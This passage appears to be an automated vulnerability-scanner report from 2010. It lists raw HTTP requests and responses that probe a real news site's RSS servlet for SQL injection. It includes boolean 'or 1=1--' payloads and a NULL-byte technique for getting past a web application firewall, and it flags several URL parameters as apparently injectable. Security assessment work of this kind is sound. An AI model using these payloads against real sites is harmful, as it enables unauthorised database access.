<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi87447082'%20or%201%3d2--%20/rss/CustomRssServlet/568/200754.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:19:26 GMT Date: Tue, 07 Dec 2010 23:19:26 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200756.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:13 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200756.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:13 GMT Content-Length: 0 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200757.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:01 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200757.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:21:01 GMT Date: Tue, 07 Dec 2010 23:21:01 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200757.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:11 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200757.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:11 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 24161260'%20or%201%3d1--%20 and 24161260'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet24161260'%20or%201%3d1--%20/568/200759.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:59 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet24161260'%20or%201%3d2--%20/568/200759.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:00 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 35561059%20or%201%3d1--%20 and 35561059%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56835561059%20or%201%3d1--%20/200759.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:07 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56835561059%20or%201%3d2--%20/200759.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:08 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 33757705'%20or%201%3d1--%20 and 33757705'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet33757705'%20or%201%3d1--%20/568/200760.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:07 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet33757705'%20or%201%3d2--%20/568/200760.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:07 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 93704237'%20or%201%3d1--%20 and 93704237'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi93704237'%20or%201%3d1--%20/rss/CustomRssServlet/568/200764.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:47 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi93704237'%20or%201%3d2--%20/rss/CustomRssServlet/568/200764.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:19:48 GMT Date: Tue, 07 Dec 2010 23:19:48 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200764.xml%00' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Expires: Tue, 07 Dec 2010 23:20:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 07 Dec 2010 23:20:10 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200764.xml%00'' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200765.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:19:31 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200765.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:31 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 20373858'%20or%201%3d1--%20 and 20373858'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56820373858'%20or%201%3d1--%20/200765.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:19:35 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56820373858'%20or%201%3d2--%20/200765.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:19:35 GMT Content-Length: 0 Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200765.xml%00' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Expires: Tue, 07 Dec 2010 23:19:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 07 Dec 2010 23:19:38 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200765.xml%00'' HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 12899183'%20or%201%3d1--%20 and 12899183'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
